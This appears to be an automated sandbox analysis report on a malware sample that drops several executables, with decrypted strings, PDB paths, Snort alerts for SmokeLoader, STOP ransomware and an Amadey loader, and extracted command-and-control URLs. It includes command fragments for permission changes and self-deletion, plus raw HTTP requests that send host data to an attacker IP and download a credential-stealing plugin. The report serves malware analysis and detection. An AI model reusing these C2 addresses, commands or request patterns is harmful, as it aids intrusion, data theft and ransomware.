Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: ESET
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: Panda Security
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: Doctor Web
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: 360TotalSecurity
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: Bitdefender
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: Norton
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: Sophos
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: Comodo
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: WinDefender
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: 0123456789
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: ------
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: ?scr=1
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: .jpg
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: ComputerName
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: -unicode-
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: VideoID
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: \0000
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: DefaultSettings.XResolution
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: DefaultSettings.YResolution
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: ProductName
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: 2019
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: 2022
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: 2016
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: CurrentBuild
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: echo Y\|CACLS "
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: " /P "
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: CACLS "
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: :R" /E
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: :F" /E
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: &&Exit
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: rundll32.exe
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: "taskkill /f /im "
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: " && timeout 1 && del
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: && Exit"
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: " && ren
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: &&
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: Powershell.exe
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: -executionpolicy remotesigned -File "
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: .D\
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor:
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: N}
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: pa
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: yz
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: l
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: I5
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: {(s
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: 3M
Source: 22.2.NewPlayer.exe.60000.0.unpack	String decryptor: !m

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\D804.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\57DC.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9F31.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B46F.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\5DA0.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A3D5.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\BC2.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\D689.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\EA44.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\388B.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\CBE6.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build2[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\C861.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\673.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A170.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3E02.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\6FA9.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B8C8.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\F4F7.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3C54.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\913F.exe	Joe Sandbox ML: detected

Source: D804.exe, 00000013.00000002.636070288.0000000003214000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\D804.exe	Unpacked PE file: 6.2.D804.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe	Unpacked PE file: 16.2.D804.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\D804.exe	Unpacked PE file: 19.2.D804.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\B46F.exe	Unpacked PE file: 26.2.B46F.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\A170.exe	Unpacked PE file: 29.2.A170.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exe	Unpacked PE file: 31.2.D804.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	Unpacked PE file: 32.2.build2.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\913F.exe	Unpacked PE file: 37.2.913F.exe.400000.0.unpack

Source: 01860199.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\D804.exe	File created: C:\_readme.txt
Source: C:\Users\user\AppData\Local\Temp\D804.exe	File created: C:\Users\user\_readme.txt

Source: C:\Users\user\Desktop\01860199.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: unknown	HTTPS traffic detected: 217.174.148.28:443 -> 192.168.2.3:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.174.148.28:443 -> 192.168.2.3:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.174.148.28:443 -> 192.168.2.3:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49802 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 217.174.148.28:443 -> 192.168.2.3:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49808 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 157.240.17.17:443 -> 192.168.2.3:49827 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 157.240.9.35:443 -> 192.168.2.3:49837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49844 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49853 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49883 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 157.240.17.17:443 -> 192.168.2.3:49892 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 157.240.9.35:443 -> 192.168.2.3:49894 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49903 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49924 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 80.66.203.53:443 -> 192.168.2.3:49934 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49947 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 157.240.17.17:443 -> 192.168.2.3:49970 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49971 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 157.240.9.35:443 -> 192.168.2.3:49975 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:50000 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 157.240.17.17:443 -> 192.168.2.3:50021 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 157.240.234.35:443 -> 192.168.2.3:50022 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:50024 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:50031 version: TLS 1.2

Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: D804.exe, 00000005.00000002.442867169.0000000002690000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000006.00000002.449975040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, D804.exe, 0000000D.00000002.450667818.0000000002530000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000010.00000002.617846506.0000000000400000.00000040.00000400.00020000.00000000.sdmp, D804.exe, 00000012.00000002.451684545.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000013.00000002.617779609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, B46F.exe, 00000019.00000002.474131384.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, B46F.exe, 0000001A.00000002.488867120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, A170.exe, 0000001B.00000002.493740298.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 0000001C.00000002.491035809.0000000002460000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 00000001.00000000.378518677.00007FFC1B351000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 00000001.00000000.378518677.00007FFC1B351000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: helppane.pdb source: 3C54.exe, 00000014.00000002.507574434.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.644812591.00007FF777031000.00000020.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: NewPlayer.exe, 00000016.00000002.476201608.0000000000091000.00000002.00000001.01000000.00000011.sdmp, NewPlayer.exe, 00000016.00000000.461052075.0000000000091000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\sucagidupusehi\pahopigap\5\muhoyawa.pdb source: 01860199.exe, 00000000.00000000.351185873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, hwgujdv, 00000004.00000000.433612531.0000000000401000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: AC:\sucagidupusehi\pahopigap\5\muhoyawa.pdb source: 01860199.exe, 00000000.00000000.351185873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, hwgujdv, 00000004.00000000.433612531.0000000000401000.00000020.00000001.01000000.00000006.sdmp
Source:	Binary string: TEST_mi_exe_stub.pdb source: D804.exe, 00000013.00000003.473635062.0000000009A20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\huvuvig\juhohan\bamakexuvoni\vaxilil\javefi\5\liguvihahoca\suci.pdb source: explorer.exe, 00000001.00000003.439363024.0000000005973000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.438814937.00000000157FF000.00000004.00000010.00020000.00000000.sdmp, D804.exe
Source:	Binary string: CGC:\huvuvig\juhohan\bamakexuvoni\vaxilil\javefi\5\liguvihahoca\suci.pdb source: explorer.exe, 00000001.00000003.439363024.0000000005973000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.438814937.00000000157FF000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: D804.exe, 00000005.00000002.442867169.0000000002690000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000006.00000002.449975040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, D804.exe, 0000000D.00000002.450667818.0000000002530000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000010.00000002.617846506.0000000000400000.00000040.00000400.00020000.00000000.sdmp, D804.exe, 00000012.00000002.451684545.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000013.00000002.617779609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, B46F.exe, 00000019.00000002.474131384.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, B46F.exe, 0000001A.00000002.488867120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, A170.exe, 0000001B.00000002.493740298.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 0000001C.00000002.491035809.0000000002460000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: eex.pdb source: explorer.exe, 00000001.00000000.378518677.00007FFC1B351000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: )5C:\rusuxenalo\dutaz jale\puyenotak\tipibu.pdb source: explorer.exe, 00000001.00000003.443261343.0000000005975000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.443214371.0000000008581000.00000004.00000001.00020000.00000000.sdmp, C861.exe, 00000007.00000000.443424351.0000000000401000.00000020.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\rusuxenalo\dutaz jale\puyenotak\tipibu.pdb source: explorer.exe, 00000001.00000003.443261343.0000000005975000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.443214371.0000000008581000.00000004.00000001.00020000.00000000.sdmp, C861.exe, 00000007.00000000.443424351.0000000000401000.00000020.00000001.01000000.00000009.sdmp

Source: C:\Users\user\AppData\Local\Temp\D804.exe

Code function: 5_2_00403870 GetStringTypeExA,FindFirstVolumeMountPointW,GetPrivateProfileIntA,WaitForSingleObject,FreeConsole,GetConsoleCursorInfo,GetModuleFileNameW,EnumFontsW,GetConsoleCursorInfo,GetModuleFileNameW,EnumFontsW,GetVersionExW,GetConsoleAliasesLengthA,SleepEx,CreateFileMappingW,CreateMutexA,GetCommState,FreeConsole,MapGenericMask,DebugBreak,AttachConsole,MapGenericMask,DebugBreak,FreeConsole,AttachConsole,FreeConsole,InterlockedExchangeAdd,WaitForMultipleObjectsEx,GetCharWidthW,GetCharABCWidthsFloatW,GetCharWidthW,GetCharABCWidthsFloatW,GetLastError,GetLastError,ReplaceFileA,WritePrivateProfileStringW,lstrcmpiW,CreateEventW,ReplaceFileA,WritePrivateProfileStringW,lstrcmpiW,CreateEventW,MulDiv,CreateActCtxA,GetFileAttributesExW,GetLogicalDriveStringsA,MulDiv,CreateActCtxA,GetFileAttributesExW,GetLogicalDriveStringsA,GetLongPathNameA,WritePrivateProfileStructW,IsBadReadPtr,CancelWaitableTimer,GetFileType,GetModuleHandleA,

Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: toobussy.com
Source: C:\Windows\explorer.exe	Network Connect: 123.140.161.243 80
Source: C:\Windows\explorer.exe	Network Connect: 80.66.203.53 443
Source: C:\Windows\explorer.exe	Domain query: colisumy.com
Source: C:\Windows\explorer.exe	Domain query: potunulit.org
Source: C:\Windows\explorer.exe	Domain query: speedlab.com.eg
Source: C:\Windows\explorer.exe	Network Connect: 45.9.74.80 80
Source: C:\Windows\explorer.exe	Network Connect: 217.174.148.28 443
Source: C:\Windows\explorer.exe	Network Connect: 175.119.10.231 80
Source: C:\Windows\explorer.exe	Network Connect: 188.114.97.7 80
Source: C:\Windows\explorer.exe	Network Connect: 211.40.39.251 80
Source: C:\Windows\explorer.exe	Network Connect: 188.114.96.7 80
Source: C:\Windows\explorer.exe	Network Connect: 211.119.84.112 80
Source: C:\Windows\explorer.exe	Network Connect: 183.100.39.157 80
Source: C:\Windows\explorer.exe	Domain query: shsplatform.co.uk
Source: C:\Windows\explorer.exe	Network Connect: 222.236.49.123 80
Source: C:\Windows\explorer.exe	Network Connect: 194.180.48.90 80
Source: C:\Windows\explorer.exe	Network Connect: 222.236.49.124 80

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2045695 ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org) 192.168.2.3:57990 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2045695 ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org) 192.168.2.3:56924 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2045695 ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org) 192.168.2.3:53975 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.3:49713 -> 123.140.161.243:80
Source: Traffic	Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.3:49713 -> 123.140.161.243:80
Source: Traffic	Snort IDS: 2045695 ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org) 192.168.2.3:59636 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 175.119.10.231:80 -> 192.168.2.3:49711
Source: Traffic	Snort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.3:49714 -> 211.59.14.90:80
Source: Traffic	Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 211.59.14.90:80 -> 192.168.2.3:49714
Source: Traffic	Snort IDS: 2839238 ETPRO TROJAN Blackmoon CnC Activity 192.168.2.3:49720 -> 103.100.211.218:80
Source: Traffic	Snort IDS: 2045695 ET TROJAN DNS Query to SmokeLoader Domain (potunulit .org) 192.168.2.3:60767 -> 8.8.8.8:53
Source: Traffic	Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.3:49721 -> 175.119.10.231:80
Source: Traffic	Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.3:49721 -> 175.119.10.231:80

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 50001 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 50001
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 50032

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 45.9.74.80/0bjdn2Z/index.php
Source: Malware configuration extractor	URLs: http://zexeq.com/raud/get.php
Source: Malware configuration extractor	URLs: http://toobussy.com/tmp/
Source: Malware configuration extractor	URLs: http://wuc11.com/tmp/
Source: Malware configuration extractor	URLs: http://ladogatur.ru/tmp/
Source: Malware configuration extractor	URLs: http://kingpirate.ru/tmp/
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199508624021
Source: Malware configuration extractor	URLs: https://t.me/looking_glassbot

Source: global traffic	HTTP traffic detected: POST /0bjdn2Z/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTAzNzI2Host: 45.9.74.80Content-Length: 103878Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0bjdn2Z/Plugins/cred64.dll HTTP/1.1Host: 45.9.74.80
Source: global traffic	HTTP traffic detected: POST /0bjdn2Z/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.9.74.80Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 37 26 73 64 3d 35 32 63 39 34 38 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 36 34 33 33 39 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.67&sd=52c948&os=1&bi=1&ar=0&pc=364339&un=user&dm=&av=13&lv=0&og=1
